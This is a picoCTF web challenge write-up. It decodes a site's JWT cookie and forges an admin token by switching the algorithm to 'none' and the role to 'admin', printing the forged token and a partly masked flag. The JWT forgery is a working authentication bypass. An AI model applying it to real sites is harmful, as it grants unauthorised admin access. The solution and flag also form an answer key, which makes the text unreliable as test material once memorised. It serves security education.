Description
Most web application developers use third party components
without testing their security. Some of the past affected
companies are:
- Equifax (a US credit bureau organization) - breach due to
unpatched Apache Struts web framework CVE-2017-5638 - Mossack Fonesca (Panama Papers law firm) breach -
unpatched version of Drupal CMS used - VerticalScope (internet media company) - outdated
version of vBulletin forum software used
Can you identify the components and exploit the
vulnerable one?
The website is running here. Can you become an admin?
You can login as test with the password Test123! to get
started.
To start you can go to the developer tools, then application, the cookies to see the cookies for the site. After logging in with the test credentials a new JWT (JSON Web Token) cookie.
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdXRoIjoxNzA5NjE3NTUzMDg4LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMjIuMC4wLjAgU2FmYXJpLzUzNy4zNiIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNzA5NjE3NTUzfQ.Wqcg2Ywm6ZPT7bcEGuBs01lhvU_I3VQ2HOG7772H-eU
The . is the seperator so it can be seen that there are three parts. First being the header, then the payload, then lastly the signature. Since they are in base64 it could be decoded with CyberChef.
Part 1:
Base64: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9
Decoded: {"typ":"JWT","alg":"HS256"}
Part 2:
Base64: eyJhdXRoIjoxNzA5NjE3NTUzMDg4LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMjIuMC4wLjAgU2FmYXJpLzUzNy4zNiIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNzA5NjE3NTUzfQ
Decoded: {"auth":1709617553088,"agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36","role":"user","iat":1709617553}
Part 3:
Base64: Wqcg2Ywm6ZPT7bcEGuBs01lhvU_I3VQ2HOG7772H-eU
Decoded: Z§ Ù�&é�Óí·��àlÓYa½B7U�8nûïaÞ
The last part is hashed (HS256) which is why it outputs a weird value.
By taking the second part's decoded version and putting it into cyberchef to encode while changing the role from user to admin you can get a changed cookie value. For the first part you have the alg set to HS256 which is what creates the third part. By setting that to none we then don't have to worry about the third part and could leave it blank. So just take the first part's decoded output and change HS256 to none then re-encode with base64.
By then reconstructing and putting the parts back together you can get the full JWT cookie back with admin role. Be careful to remove any "=" padding with base64 because it is ignored with JWT tokens.
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNzA5NjE3NTUzMDg4LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMjIuMC4wLjAgU2FmYXJpLzUzNy4zNiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTcwOTYxNzU1M30.
When you change the cookie value to the modified cookie and refresh the page you get the flag.
Flag: picoCTF{succ3ss_@u7h3nt1c@710...4eacf}